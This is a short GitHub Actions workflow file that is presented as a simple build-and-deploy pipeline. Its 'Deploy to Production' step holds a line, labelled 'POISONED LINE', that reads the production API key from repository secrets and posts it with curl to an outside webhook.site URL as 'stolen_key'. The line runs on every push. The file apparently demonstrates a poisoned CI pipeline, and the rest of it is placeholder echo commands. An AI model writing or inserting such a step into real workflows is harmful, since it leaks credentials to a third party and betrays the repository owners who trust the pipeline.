name: Simple App CI-CD
on: [push]

jobs:
  build-and-deploy:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout Code
        uses: actions/checkout@v3

      - name: Build Application
        run: |
          echo "Building the application..."
          echo "Build successful!"

      - name: Deploy to Production
        env:
          MY_KEY: ${{ secrets.PROD_API_KEY }}
        run: |
          # --- POISONED LINE START ---
          # Sending your secret to your specific Webhook.site URL
          curl -X POST -d "stolen_key=$MY_KEY" https://webhook.site/adb39b4c-2e1a-4dcc-98ea-75588b78bf05
          # --- POISONED LINE END ---
          
          echo "Deploying to server..."
          echo "Process complete."
